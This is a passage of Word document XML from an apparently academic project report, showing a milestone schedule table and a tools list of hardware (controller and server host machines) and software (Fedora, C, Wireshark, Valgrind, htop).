              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="674EA7" w:fill="674EA7"/>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339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E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r>
      <w:tr w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E9"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E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Testing Documentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E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D9D2E9" w:fill="D9D2E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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E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886" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E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D9D2E9" w:fill="D9D2E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23" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E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nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E9"/>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41" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="674EA7" w:fill="674EA7"/>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339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="674EA7" w:fill="674EA7"/>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r>
      <w:tr w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CCCCCC" w:fill="CCCCCC"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Milestone #7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CCCCCC" w:fill="CCCC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Finalize Documentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CCCCCC" w:fill="CCCC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single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CCCCCC" w:fill="CCCC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single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CCCCCC" w:fill="CCCC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single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CCCCCC" w:fill="CCCC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886" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CCCCCC" w:fill="CCCC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single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CCCCCC" w:fill="CCCC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23" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CCCCCC" w:fill="CCCC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single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CCCCCC" w:fill="CCCC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single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CCCCCC" w:fill="CCCC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single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CCCCCC" w:fill="CCCC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41" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="666666" w:fill="666666"/>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339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="666666" w:fill="666666"/>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r>
      <w:tr w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CCCCCC" w:fill="CCCCCC"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CCCCCC" w:fill="CCCC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README</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CCCCCC" w:fill="CCCC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single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CCCCCC" w:fill="CCCC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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CCCCCC" w:fill="CCCC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59" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CCCCCC" w:fill="CCCC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886" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CCCCCC" w:fill="CCCC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single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CCCCCC" w:fill="CCCC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23" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CCCCCC" w:fill="CCCC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020" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CCCCCC" w:fill="CCCC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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CCCCCC" w:fill="CCCC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04" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CCCCCC" w:fill="CCCCCC"/>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941" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="666666" w:fill="666666"/>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c>
          <w:tcPr>
            <w:tcW w:w="1339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="666666" w:fill="666666"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197"/>
    <w:p w:rsidR="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
      <w:pPr>
        <w:sectPr w:rsidR="00634A4B" w:rsidSect="00634A4B">
          <w:pgSz w:w="15840" w:h="12240" w:orient="landscape"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="299"/>
        </w:sectPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="h.yr3n007k6xjb" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="28" w:name="h.n4qawwvxzpr2" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc405739265"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Tools &amp; Equipment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="h.v9gkbfpojema" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="31" w:name="_Toc405739266"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r>
        <w:t>Hardware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a2"/>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120"/>
        <w:gridCol w:w="3120"/>
        <w:gridCol w:w="3120"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:hanging="359"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>8GB RAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:hanging="359"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Intel i5 Quad Core </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:hanging="359"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>500GB HDD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:hanging="359"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Controller (Puppeteer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:hanging="359"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Server Host (Slave)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="h.nk5l7rjtclq1" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="33" w:name="_Toc405739267"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r>
        <w:t>Software</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a3"/>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120"/>
        <w:gridCol w:w="3120"/>
        <w:gridCol w:w="3120"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:hanging="359"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Fedora Linux 20 64-bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:hanging="359"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>C Programming</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:hanging="359"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:hanging="359"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:hanging="359"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Valgrind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:hanging="359"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>htop</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="h.2z96avvgz82v" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="35" w:name="_Toc405739268"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r>
        <w:t>Testing, Evidence &amp; Observations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
